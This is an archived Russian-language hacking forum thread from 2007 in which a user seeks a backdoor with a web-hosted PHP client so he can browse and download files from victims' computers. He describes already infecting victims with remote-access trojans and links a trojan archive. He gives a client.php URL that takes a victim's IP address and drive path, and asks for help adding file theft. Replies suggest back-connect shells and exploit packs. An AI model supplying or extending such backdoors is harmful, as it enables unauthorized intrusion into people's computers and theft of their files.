PDA

Просмотр полной версии : Ищю бекдор с php клиентом


Nightmarе
12.06.2007, 19:34
В общем такая проблемма... мне очень нужен бекдор, чтобы можно к жертвае приджониться через .php скрипт, другие бекдоры - не моя тема, так как у меня IP адрес не вшений, и я ни к кому заджониться не могу...

Никак не могу найти нигде такого... мне нужна всего лишь 1 функция: просматривать и качать файлы с чужого винчестера, и всё...
Если кто сможет помочь, то убедительная просьба...
Или пишите на E-Mail: nightmare@prank.ru, мне он очень нужен, а самому написать эт кишка тонка ;(

genom--
12.06.2007, 20:35
нафиг тебе php клиент? и я не понимаю как то что у тебя внутренний ip мешает тебе приконнектится к жертве?

может бэкконектом на шелл попробуй хз -- пояснее напиши что у тебя не может заджойниться -- а то нифига непонятно

Nightmarе
12.06.2007, 22:29
У меня внутренние IP адреса, то есть я могу любым бекдором приджониться только к тем кто в моей подсети, к другим - нет.

Мне нужен .exe файл сервера который запустит жертва, и .php скрипт с помощь которого я введу IP и порт и получу файлы с винчестера. я пробовал все бекдоры успешно троянил жертв но несмог ни к кому заджонится, и PRO RAT юзал и всё бестолку...

Тебе по ходу просто связка сплоитов нужна, которая грузит троян.
Сервер я как нить сам впарю нужным жертвам, другое дело что со своего IP я нихрена не заджонюсь, вот php клиент который через сокеты грузанётся и законнектится - другое дело... У меня даже был подобный троян, но он только просматривал файлы и всё.... .exe сервер был написан на ассемблере а php клиент написан на php+сокеты... и всё... но к сожалению он тока файлы просматривает ;(

genom--
12.06.2007, 22:48
пипец извини а чем ты отличаешься от тогоше php который через сокеты если у тебя закрыт коннект из локалки в нет то каким пупом php будет коннектится --- имхо открой себе нормальный доступ в инет и все

nEsJs
12.06.2007, 23:00
нах тебе именно php? тот же c++ асм дельфя =\

Nightmarе
12.06.2007, 23:59
Мда... дело в том что если джониться напрямую программой, то никак не получится, я с кучей народа тестировал... А если я повешу себе на сайт php клиента как я делал, то уже коннектится к жертве сервер, соответственно другой провайдер и т.д... Со внешним IP адресом, и доступ получен... Я сам точно не могу объяснить почему у меня не пашут все бекдоры, но это факт, я джонюсь только к тем у кого IP адреса начинаются на 88.200... другие же пролетают... и отключение файрвола и т.д... просто нельзя приконнектиться.... я всё пробовал... и руткит H.D. и pro rat и ALB и т.д... через них можно заджониться к тем у кого провайдер Волгателеком. А через php клиент я джонился ко всем подряд... но это пробная версия была...

Nightmarе
13.06.2007, 00:43
В общем народ я нашёл того трояна который делает почти то что надо, он просматривает файлы на заражённом компе, но вот скачать их нельзя никак... если дело в .php клиенте то помогите пожалуйста дописать функцию скачки если это реально, вот троян:
http://shinobi.org.ru/bdphp.rar

server.exe - написан на АСМЕ открывает 21 порт и всё...

client.php - вешаю на сайт и джонюсь:
http://shinobi.org.ru/client.php?ip=11.22.11.22&dir=C:/

В общем очень надеюсь на вашу помощь!!!!!!!!!!!!!!!!!!!!!!!!!

C!klodoL
13.06.2007, 00:47
вы не поняли, он пишет о том что у него локалка, и его комп не виден из инета, то есть внешние подкючения к его компу не катят, он хочет рулить троем через вэб интерфейс

Nightmarе
13.06.2007, 00:49
именно! мне нужен только веб интерфейс!!!!!!!!!!!!

Nightmarе
13.06.2007, 00:52
Тем более от такого бекдора польза колосальная, это же ещё способ не запалиться, можно например через анонимайзер...

Nightmarе
16.06.2007, 15:18
???